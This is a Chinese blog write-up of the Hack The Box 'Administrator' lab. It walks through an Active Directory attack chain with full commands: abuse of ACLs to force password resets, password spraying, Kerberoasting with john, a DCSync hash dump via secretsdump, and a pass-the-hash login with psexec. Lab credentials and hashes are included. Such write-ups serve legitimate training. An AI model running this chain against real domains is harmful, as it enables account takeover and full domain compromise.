当前位置: 首页 > article >正文

HTB:Administrator[WriteUP]

article 2025/2/6 1:40:41

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

横向移动A

使用netexec内置的bloodhound模块收集靶机域内信息

​编辑

将数据文件上传至bloodhound分析

查看当前控制用户的可传递控制对象

为olivia用户创建凭证对象

使用Set-DomainUserPassword通过olivia用户凭证对象修改michael用户密码

使用bloodyAD通过michael凭证修改benjamin用户密码

使用ftp通过上述凭证登录靶机FTP服务器

使用pwsafe2john将该文件转换为哈希格式

使用john对该哈希文件进行字典爆破

使用Password Safe通过上述密码打开该数据库文件

使用netexec收集靶机域内用户名单

使用netexec通过上述名单和密码进行密码喷洒

横向移动B

使用BloodHound查看至域管理员最短路径

使用bloodyAD将ethan用户的SPN属性修改为服务账户格式

使用impacket-GetUserSPNs获取ethan用户的ST票据

使用john通过字典爆破该TGS票据

权限提升

使用netexec通过凭证测试能否登录靶机Win-RM服务

使用BloodHound查看ethan用户一级控制对象

使用impacket-secretsdump通过DCSync权限转储域内用户密码哈希

使用impacket-psexec通过administrator哈希密码直接登录靶机

连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.42

靶机AD:administrator.htb

靶机DC:dc.administrator.htb

  • 已有凭证

账户:Olivia

密码:ichliebedich

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a administrator.htb -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,                                                          
21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,62491,63695,63700,63711,63722,63758
                                                                                                                                          
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
                                                                                                                                          
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,62491,63695,63700,63711,63722,63758

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn administrator.htb

  • 需要重点关注的端口和服务

21端口:FTP服务

53端口:Domain服务

88端口:Kerberos服务

389端口:LDAP服务

445端口:SMB服务

5985端口:Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn administrator.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn administrator.htb

使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p53,123 -sCV -Pn administrator.htb

横向移动A

使用netexec内置的bloodhound模块收集靶机域内信息

netexec ldap administrator.htb -u 'Olivia' -p 'ichliebedich' --bloodhound -c All --dns-server 10.10.11.42

将数据文件上传至bloodhound分析

查看当前控制用户的可传递控制对象

  • 由图表显示可见,OLIVIA用户可完全控制MICHAEL用户,而MICHAEL用户可修改BENJAMIN用户密码。将该图表中所有图标设置为已控制
为olivia用户创建凭证对象
  • 上传PowerView.ps1脚本文件
upload PowerView.ps1

*Evil-WinRM* PS C:\Users\olivia\Desktop> upload PowerView.ps1
                                        
Info: Uploading /home/kali/Desktop/temp/PowerView.ps1 to C:\Users\olivia\Desktop\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!

  • 加载导入该脚本文件
. .\PowerView.ps1
  • 创建凭证对象
$SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator\olivia', $SecPassword)
使用Set-DomainUserPassword通过olivia用户凭证对象修改michael用户密码
  • 创建安全密码对象
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
  • 通过安全密码对象修改michael用户密码
Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $Cred
使用bloodyAD通过michael凭证修改benjamin用户密码
bloodyAD -d 'administrator.htb' -u 'michael' -p 'Password123!' --host '10.10.11.42' set password 'benjamin' 'Password123!'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# bloodyAD -d 'administrator.htb' -u 'michael' -p 'Password123!' --host '10.10.11.42' set password 'benjamin' 'Password123!'
[+] Password changed successfully!

使用ftp通过上述凭证登录靶机FTP服务器

ftp administrator.htb
  • Backup.psafe3文件下载到攻击机本地

使用pwsafe2john将该文件转换为哈希格式
pwsafe2john Backup.psafe3 | tee hash

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# pwsafe2john Backup.psafe3 | tee hash
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

使用john对该哈希文件进行字典爆破
john hash --wordlist=../dictionary/rockyou.txt

使用Password Safe通过上述密码打开该数据库文件

  • 将密码逐个复制出来

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

使用netexec收集靶机域内用户名单

netexec ldap administrator.htb -u 'benjamin' -p 'Password123!' --users | grep -A20 Username | tail -n+2 | awk '{print $5}' | tee names.txt

  • 将上述三条密码写入文件中以便使用

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat << EOF > passwds.txt
heredoc> UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
heredoc> UXLCI5iETUsIBoFVTj8yQFKoHjXmb
heredoc> WwANQWnmJnGV07WQN8bMS7FMAbjNur
heredoc> EOF

使用netexec通过上述名单和密码进行密码喷洒
netexec ldap administrator.htb -u names.txt -p passwds.txt --continue-on-success

  • 在BloodHound中将emily用户标记为已控制

账户:emily

密码:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

  • C:\Users\emily\Desktop目录下找到user.txt文件

横向移动B

使用BloodHound查看至域管理员最短路径

  • 由图表可见,当前emily用户对ethan用户具有GenericWrite权限

使用bloodyAD将ethan用户的SPN属性修改为服务账户格式

bloodyAD -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --host '10.10.11.42' set object ethan servicePrincipalName -v 'x0da6h/x0da6h'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# bloodyAD -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --host '10.10.11.42' set object ethan servicePrincipalName -v 'x0da6h/x0da6h'
[+] ethan's servicePrincipalName has been updated

使用impacket-GetUserSPNs获取ethan用户的ST票据
impacket-GetUserSPNs 'administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -request

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5f49ef0be2b6972a92c82e1234963f8f$81f519aed5a1067bf4a440646a632ba76c13547f441269e61baeaa1a4a45a279bd657ff9dee2833b038646f5331e9d91e25d01ca5942193e710e42b448469dde617df9670cf675d14583976933bfe8930c399eb10139d48eb1d796032f5fe7faddd046f24c54fc39b930cd7a0950c69cfe08671541b92722b74fbee710c5dcbb076283f61bde7c2a1e86a319961427728ef398ad1b86270aaf17c0e19430d0660d216aa1c599a82531ea00542f880abb85e7a381ab705f1b32919ab294f3d7783ba99e1622662ba8cf0c39b0dcfd5dfbd8558cf15ecdb849a0d5035054eed8515aff22f24c0a0444e2455f1e69936176a5d07aebc20378ee6a93a150af8544106b9678112ee588fc9318041c40f8a32eacc447766bf4349f3af6babc27a91788a1f6b08351f77204214e0eb29af694ebb5951bee9bdf99db9d07caeedd12ffb87e987550807ff2b7291575b90d18c99381f0eee79b80a51a3cee151a2367b49cb9a0ecf667c9cfe93c6b8effa053a0a04fba42c8af94482f437b424be2ea0cc5a7964a2f74e648f50d5fed91d38b4759c2704097b50b84774a2235acea898b1208fe22f761f0aff586f79caec60f00577b3f6831122569d23a99102705d4fe6bee7709a5d066cf4ae08648b70753bb860634f1e373fc957dbc7075c5e0902604cfe8f15fad35d99a3b4bb3e00d56e21d6847601e8a7c6b8a21eefe094b6901cd300f5ec63039b189b254d0bb40ea7ace243c31e73b767c654f26ebeefbff9739125babdfb42444dd30f79b7a7863ea0a121be40bf79cd0aee25e39177c57e920c87974c8444d3386b3440a7135bc25f1ecdd515f320455a29f23e16f66145cad7a10d951a1881d75199d203605cb4f13fac9059732cde7ced8c21fdc1e3becc489262ffdb27e19cb1a3c44e083c8a608875f96a9be319f863e3c43bbfb035b3ea077851b962c05c43cd903371a27466edf39a24c8504b792c146ccd9412d11e8597a1d188cd4e57d11a3524872ab2a9ce28eab637af7993b240ccf90375d4e93d498f5bd69f7118e2fb3f572d3457bfcdd9fddf8b9ab2783064f0480aca39884e156905f0a1d244e87a238a21081e1ff7d33159a0e1bbca2002b4603938d872c665112110d2abe8d22e7f1fd8571720cc19ff43b1fc466fd1427835cb38fe408b454b708a2883f027a2bd6abef4534296f23af5a2c59f340df2e9e2c19742a6d84d591739ef88bddb26192a125a3fb6abe22bf2c929aaab6faa7abff3cb7680818b25d314ae7ae6b22c97913d4b3c5c4861b9a9394bdd17aeb9ac76ca34e46e3401841cad6683ddd7b0435c8a17dac610e37ed82d6b03c75b280465dae5ca72abf10647ad3ee8c93d2a4aeee7e71e1e84562befdd270f0c7f1dc3d46607dc12760abaf120fe38a98617df6a69fc2b59279b7dc66e3454c8d5ecb6151f6d147fe1ed46f2deeb4cd329a5dfe164223d36770e4f9f8dbcc58c924b79d1a466d733e3b73cfd3e5eae40be05ec39345fac361edddea45781c498bdc3b8dc9f78144
  • 将该哈希值存入文件以便爆破
echo '$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5f49ef0be2b6972a92c82e1234963f8f$81f519aed5a1067bf4a440646a632ba76c13547f441269e61baeaa1a4a45a279bd657ff9dee2833b038646f5331e9d91e25d01ca5942193e710e42b448469dde617df9670cf675d14583976933bfe8930c399eb10139d48eb1d796032f5fe7faddd046f24c54fc39b930cd7a0950c69cfe08671541b92722b74fbee710c5dcbb076283f61bde7c2a1e86a319961427728ef398ad1b86270aaf17c0e19430d0660d216aa1c599a82531ea00542f880abb85e7a381ab705f1b32919ab294f3d7783ba99e1622662ba8cf0c39b0dcfd5dfbd8558cf15ecdb849a0d5035054eed8515aff22f24c0a0444e2455f1e69936176a5d07aebc20378ee6a93a150af8544106b9678112ee588fc9318041c40f8a32eacc447766bf4349f3af6babc27a91788a1f6b08351f77204214e0eb29af694ebb5951bee9bdf99db9d07caeedd12ffb87e987550807ff2b7291575b90d18c99381f0eee79b80a51a3cee151a2367b49cb9a0ecf667c9cfe93c6b8effa053a0a04fba42c8af94482f437b424be2ea0cc5a7964a2f74e648f50d5fed91d38b4759c2704097b50b84774a2235acea898b1208fe22f761f0aff586f79caec60f00577b3f6831122569d23a99102705d4fe6bee7709a5d066cf4ae08648b70753bb860634f1e373fc957dbc7075c5e0902604cfe8f15fad35d99a3b4bb3e00d56e21d6847601e8a7c6b8a21eefe094b6901cd300f5ec63039b189b254d0bb40ea7ace243c31e73b767c654f26ebeefbff9739125babdfb42444dd30f79b7a7863ea0a121be40bf79cd0aee25e39177c57e920c87974c8444d3386b3440a7135bc25f1ecdd515f320455a29f23e16f66145cad7a10d951a1881d75199d203605cb4f13fac9059732cde7ced8c21fdc1e3becc489262ffdb27e19cb1a3c44e083c8a608875f96a9be319f863e3c43bbfb035b3ea077851b962c05c43cd903371a27466edf39a24c8504b792c146ccd9412d11e8597a1d188cd4e57d11a3524872ab2a9ce28eab637af7993b240ccf90375d4e93d498f5bd69f7118e2fb3f572d3457bfcdd9fddf8b9ab2783064f0480aca39884e156905f0a1d244e87a238a21081e1ff7d33159a0e1bbca2002b4603938d872c665112110d2abe8d22e7f1fd8571720cc19ff43b1fc466fd1427835cb38fe408b454b708a2883f027a2bd6abef4534296f23af5a2c59f340df2e9e2c19742a6d84d591739ef88bddb26192a125a3fb6abe22bf2c929aaab6faa7abff3cb7680818b25d314ae7ae6b22c97913d4b3c5c4861b9a9394bdd17aeb9ac76ca34e46e3401841cad6683ddd7b0435c8a17dac610e37ed82d6b03c75b280465dae5ca72abf10647ad3ee8c93d2a4aeee7e71e1e84562befdd270f0c7f1dc3d46607dc12760abaf120fe38a98617df6a69fc2b59279b7dc66e3454c8d5ecb6151f6d147fe1ed46f2deeb4cd329a5dfe164223d36770e4f9f8dbcc58c924b79d1a466d733e3b73cfd3e5eae40be05ec39345fac361edddea45781c498bdc3b8dc9f78144' > hash

使用john通过字典爆破该TGS票据

john hash --wordlist=../dictionary/rockyou.txt --format=krb5tgs

账户:ethan

密码:limpbizkit

  • 在BloodHound中将ethan用户标记为已控制

权限提升

使用netexec通过凭证测试能否登录靶机Win-RM服务

netexec winrm administrator.htb -u ethan -p 'limpbizkit'

  • 可见ethan用户无法登录Win-RM

使用BloodHound查看ethan用户一级控制对象

  • 再次查看至域管理员最短路径

使用impacket-secretsdump通过DCSync权限转储域内用户密码哈希

impacket-secretsdump 'administrator.htb/ethan:limpbizkit@10.10.11.42'

使用impacket-psexec通过administrator哈希密码直接登录靶机
impacket-psexec administrator.htb/administrator@10.10.11.42 -hashes aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e

  • C:\Users\Administrator\Desktop目录下找到root.txt文件


http://www.kler.cn/a/533100.html

相关文章:

  • 【大数据技术】教程03:本机PyCharm远程连接虚拟机Python
  • 【基于SprintBoot+Mybatis+Mysql】电脑商城项目之用户登录
  • Python 科学计算
  • kamailio的kamctl的使用
  • S4 HANA明确税金汇差科目(OBYY)
  • 【leetcode练习·二叉树拓展】归并排序详解及应用
  • 【01-Qt-C++-android】
  • Redis --- 秒杀优化方案(阻塞队列+基于Stream流的消息队列)
  • 100.3 AI量化面试题:解释配对交易(Pairs Trading)的原理,并说明如何选择配对股票以及设计交易信号
  • 使用Java操作Redis数据类型的详解指南
  • 100.5 AI量化面试题:在使用LSTM预测股票价格时,如何有效处理金融时间序列的非平稳性?
  • c++ string类 +底层模拟实现
  • 《VSCode 与 QT:强强联合的开发利器》
  • 解决 LeetCode 922 题:按奇偶排序数组 II
  • Linux 传输层协议 UDP 和 TCP
  • FPM(Effing Package Management)安装与使用指南
  • B-树:解锁大数据存储和与快速存储的密码
  • 基于JavaWeb开发的Java+Jsp+SpringMVC漫威手办商城系统设计和实现
  • 1分钟基于腾讯云TI平台搭建DeepSeek大模型
  • 2025-2-3-sklearn学习(50) (51) 完结篇 零落成泥碾作尘,只有香如故。
  • Vite:现代前端开发的利器
  • Spring Security(maven项目) 3.0.3.0版本
  • 接口测试通用测试用例
  • 深度剖析八大排序算法
  • 【MySQL — 数据库基础】深入解析MySQL的约束操作
  • 如何获取sql数据中时间的月份、年份(类型为date)